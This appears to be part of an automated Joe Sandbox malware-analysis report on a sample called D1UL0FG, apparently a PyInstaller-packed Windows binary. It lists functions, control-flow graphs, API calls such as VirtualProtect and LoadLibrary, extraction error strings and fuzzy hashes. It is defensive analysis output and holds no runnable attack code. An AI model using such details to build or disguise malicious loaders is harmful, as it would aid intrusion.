                                                                                                                                                                                                                                          control_flow_graph 838 7ff67aef69d4-7ff67aef6a47 call 7ff67aef6708 841 7ff67aef6a61-7ff67aef6a6b call 7ff67aee8590 838->841 842 7ff67aef6a49-7ff67aef6a52 call 7ff67aee4f58 838->842 848 7ff67aef6a6d-7ff67aef6a84 call 7ff67aee4f58 call 7ff67aee4f78 841->848 849 7ff67aef6a86-7ff67aef6aef CreateFileW 841->849 847 7ff67aef6a55-7ff67aef6a5c call 7ff67aee4f78 842->847 865 7ff67aef6da2-7ff67aef6dc2 847->865 848->847 850 7ff67aef6af1-7ff67aef6af7 849->850 851 7ff67aef6b6c-7ff67aef6b77 GetFileType 849->851 855 7ff67aef6b39-7ff67aef6b67 GetLastError call 7ff67aee4eec 850->855 856 7ff67aef6af9-7ff67aef6afd 850->856 858 7ff67aef6bca-7ff67aef6bd1 851->858 859 7ff67aef6b79-7ff67aef6bb4 GetLastError call 7ff67aee4eec CloseHandle 851->859 855->847 856->855 863 7ff67aef6aff-7ff67aef6b37 CreateFileW 856->863 861 7ff67aef6bd3-7ff67aef6bd7 858->861 862 7ff67aef6bd9-7ff67aef6bdc 858->862 859->847 873 7ff67aef6bba-7ff67aef6bc5 call 7ff67aee4f78 859->873 868 7ff67aef6be2-7ff67aef6c37 call 7ff67aee84a8 861->868 862->868 869 7ff67aef6bde 862->869 863->851 863->855 877 7ff67aef6c39-7ff67aef6c45 call 7ff67aef6910 868->877 878 7ff67aef6c56-7ff67aef6c87 call 7ff67aef6488 868->878 869->868 873->847 877->878 885 7ff67aef6c47 877->885 883 7ff67aef6c8d-7ff67aef6ccf 878->883 884 7ff67aef6c89-7ff67aef6c8b 878->884 887 7ff67aef6cf1-7ff67aef6cfc 883->887 888 7ff67aef6cd1-7ff67aef6cd5 883->888 886 7ff67aef6c49-7ff67aef6c51 call 7ff67aeeab30 884->886 885->886 886->865 890 7ff67aef6d02-7ff67aef6d06 887->890 891 7ff67aef6da0 887->891 888->887 889 7ff67aef6cd7-7ff67aef6cec 888->889 889->887 890->891 893 7ff67aef6d0c-7ff67aef6d51 CloseHandle CreateFileW 890->893 891->865 895 7ff67aef6d53-7ff67aef6d81 GetLastError call 7ff67aee4eec call 7ff67aee86d0 893->895 896 7ff67aef6d86-7ff67aef6d9b 893->896 895->896 896->891
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction ID: 9775d139d67edc4f97f44dc2b06c4b49005f967b52a26ff5bcff6be1e530c7ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1D037B38A8286EB50EFA4D4902AC3761FB49B98B015279DE6E973E4CF38D411D700
                                                                                                                                                                                                                                          Function 00007FF8A8AA6EE0 Relevance: 11.4, APIs: 4, Strings: 2, Instructions: 893librarymemoryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3004955837.00007FF8A8AA6000.00000080.00000001.01000000.00000016.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002926988.00007FF8A8750000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8751000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A875D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A87B5000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A87C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A87D9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A87ED000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A899E000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A89CB000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A89FD000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8A22000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8A70000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8A76000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8A78000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8A95000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002970846.00007FF8A8AA2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3005011004.00007FF8A8AA8000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a8750000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: pkey_poly1305_init$wB5
                                                                                                                                                                                                                                          • API String ID: 3300690313-1105255960
                                                                                                                                                                                                                                          • Opcode ID: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
                                                                                                                                                                                                                                          • Instruction ID: b94739d99f30637368b18d4943dd652dfa178346a2a320cf651b439f4417a8fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA62332262A59296E7598E38D40127AB7A0F7487C5F045132EADEC3BC4FB3CFA45CB15
                                                                                                                                                                                                                                          Function 00007FF8B90F2F80 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3009045792.00007FF8B90F2000.00000080.00000001.01000000.00000018.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3008735851.00007FF8B90E0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3008792565.00007FF8B90E1000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3008792565.00007FF8B90EC000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3008792565.00007FF8B90EE000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3008792565.00007FF8B90F1000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010026113.00007FF8B90F4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b90e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3300690313-0
                                                                                                                                                                                                                                          • Opcode ID: e3da923a961653f7e51c42cb2b61e8afaa56e9ac0760d8dbda0bfdb68c10b2b1
                                                                                                                                                                                                                                          • Instruction ID: 92dd807330fe8386ed1084843878383ee63274f160089ecf0f3559cc0e76ac83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3da923a961653f7e51c42cb2b61e8afaa56e9ac0760d8dbda0bfdb68c10b2b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD62E06262C5D287EB198E3DD4003B9B6A0F7487D5F045536EB9EC3784EA7DEA46CB00
                                                                                                                                                                                                                                          Function 00007FF67AED92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction ID: d28ffa42b0d84b46a6519afa3a2c2f60d18f75212e6962a0310a220fa363a27b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF06863A3874186FBA09F60B8497667350EBC8764F140775EAAD42BE4DF3CD049DA00
                                                                                                                                                                                                                                          Function 00007FF67AED1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 523 7ff67aed1950-7ff67aed198b call 7ff67aed45b0 526 7ff67aed1c4e-7ff67aed1c72 call 7ff67aedc5c0 523->526 527 7ff67aed1991-7ff67aed19d1 call 7ff67aed7f80 523->527 532 7ff67aed1c3b-7ff67aed1c3e call 7ff67aee00bc 527->532 533 7ff67aed19d7-7ff67aed19e7 call 7ff67aee0744 527->533 537 7ff67aed1c43-7ff67aed1c4b 532->537 538 7ff67aed1a08-7ff67aed1a24 call 7ff67aee040c 533->538 539 7ff67aed19e9-7ff67aed1a03 call 7ff67aee4f78 call 7ff67aed2910 533->539 537->526 544 7ff67aed1a45-7ff67aed1a5a call 7ff67aee4f98 538->544 545 7ff67aed1a26-7ff67aed1a40 call 7ff67aee4f78 call 7ff67aed2910 538->545 539->532 553 7ff67aed1a7b-7ff67aed1afc call 7ff67aed1c80 * 2 call 7ff67aee0744 544->553 554 7ff67aed1a5c-7ff67aed1a76 call 7ff67aee4f78 call 7ff67aed2910 544->554 545->532 565 7ff67aed1b01-7ff67aed1b14 call 7ff67aee4fb4 553->565 554->532 568 7ff67aed1b35-7ff67aed1b4e call 7ff67aee040c 565->568 569 7ff67aed1b16-7ff67aed1b30 call 7ff67aee4f78 call 7ff67aed2910 565->569 575 7ff67aed1b6f-7ff67aed1b8b call 7ff67aee0180 568->575 576 7ff67aed1b50-7ff67aed1b6a call 7ff67aee4f78 call 7ff67aed2910 568->576 569->532 583 7ff67aed1b9e-7ff67aed1bac 575->583 584 7ff67aed1b8d-7ff67aed1b99 call 7ff67aed2710 575->584 576->532 583->532 587 7ff67aed1bb2-7ff67aed1bb9 583->587 584->532 589 7ff67aed1bc1-7ff67aed1bc7 587->589 590 7ff67aed1be0-7ff67aed1bef 589->590 591 7ff67aed1bc9-7ff67aed1bd6 589->591 590->590 592 7ff67aed1bf1-7ff67aed1bfa 590->592 591->592 593 7ff67aed1c0f 592->593 594 7ff67aed1bfc-7ff67aed1bff 592->594 596 7ff67aed1c11-7ff67aed1c24 593->596 594->593 595 7ff67aed1c01-7ff67aed1c04 594->595 595->593 597 7ff67aed1c06-7ff67aed1c09 595->597 598 7ff67aed1c2d-7ff67aed1c39 596->598 599 7ff67aed1c26 596->599 597->593 600 7ff67aed1c0b-7ff67aed1c0d 597->600 598->532 598->589 599->598 600->596
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED7F80: _fread_nolock.LIBCMT ref: 00007FF67AED802A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF67AED1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                          • Instruction ID: b2a02993556ecdc16b705cf08276494c7cbd6882b58917f26097cdbe1aa66f93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50819573A2CA8685E764FB24E0402FD23A1EF84784F5444B5E98DC77A5DE3CE585EB40
                                                                                                                                                                                                                                          Function 00007FF67AED1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
                                                                                                                                                                                                                                          • Instruction ID: 66be77be411398093f21bb916bc5d6cc1e10f5c733e724d9ff00923978f0fc58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38416F23B2868289FB10FB31A5405B96390FF84794F5449B6ED4D87BB5DE3CE541EB00
                                                                                                                                                                                                                                          Function 00007FF67AED1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 901 7ff67aed1210-7ff67aed126d call 7ff67aedbdf0 904 7ff67aed126f-7ff67aed1296 call 7ff67aed2710 901->904 905 7ff67aed1297-7ff67aed12af call 7ff67aee4fb4 901->905 910 7ff67aed12d4-7ff67aed12e4 call 7ff67aee4fb4 905->910 911 7ff67aed12b1-7ff67aed12cf call 7ff67aee4f78 call 7ff67aed2910 905->911 917 7ff67aed12e6-7ff67aed1304 call 7ff67aee4f78 call 7ff67aed2910 910->917 918 7ff67aed1309-7ff67aed131b 910->918 924 7ff67aed1439-7ff67aed146d call 7ff67aedbad0 call 7ff67aee4fa0 * 2 911->924 917->924 919 7ff67aed1320-7ff67aed1345 call 7ff67aee040c 918->919 930 7ff67aed1431 919->930 931 7ff67aed134b-7ff67aed1355 call 7ff67aee0180 919->931 930->924 931->930 937 7ff67aed135b-7ff67aed1367 931->937 939 7ff67aed1370-7ff67aed1398 call 7ff67aeda230 937->939 942 7ff67aed139a-7ff67aed139d 939->942 943 7ff67aed1416-7ff67aed142c call 7ff67aed2710 939->943 945 7ff67aed139f-7ff67aed13a9 942->945 946 7ff67aed1411 942->946 943->930 947 7ff67aed13d4-7ff67aed13d7 945->947 948 7ff67aed13ab-7ff67aed13b9 call 7ff67aee0b4c 945->948 946->943 950 7ff67aed13ea-7ff67aed13ef 947->950 951 7ff67aed13d9-7ff67aed13e7 call 7ff67aef9ea0 947->951 952 7ff67aed13be-7ff67aed13c1 948->952 950->939 954 7ff67aed13f5-7ff67aed13f8 950->954 951->950 955 7ff67aed13c3-7ff67aed13cd call 7ff67aee0180 952->955 956 7ff67aed13cf-7ff67aed13d2 952->956 958 7ff67aed13fa-7ff67aed13fd 954->958 959 7ff67aed140c-7ff67aed140f 954->959 955->950 955->956 956->943 958->943 961 7ff67aed13ff-7ff67aed1407 958->961 959->930 961->919
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
                                                                                                                                                                                                                                          • Instruction ID: 1ec7006b102bf207a0378e5772f1d5a93109ec49e5ea2f35d8cc00beffea3e4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651D023A2C68285EA60BB22A4003BE6691FF85B94FA44175ED4DC77E5EF3CE541E700
                                                                                                                                                                                                                                          Function 00007FF67AED36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2C50: MessageBoxW.USER32 ref: 00007FF67AED2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction ID: 1068035de5f70f2578dc069b75941140bd83d80a52dbb56b8f66637b006debcc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98216563B3CA4381FA65BB24E8513B62250BFC8394FA041B6E55DC25F5EF2CE505E740
                                                                                                                                                                                                                                          Function 00007FF67AEEBACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
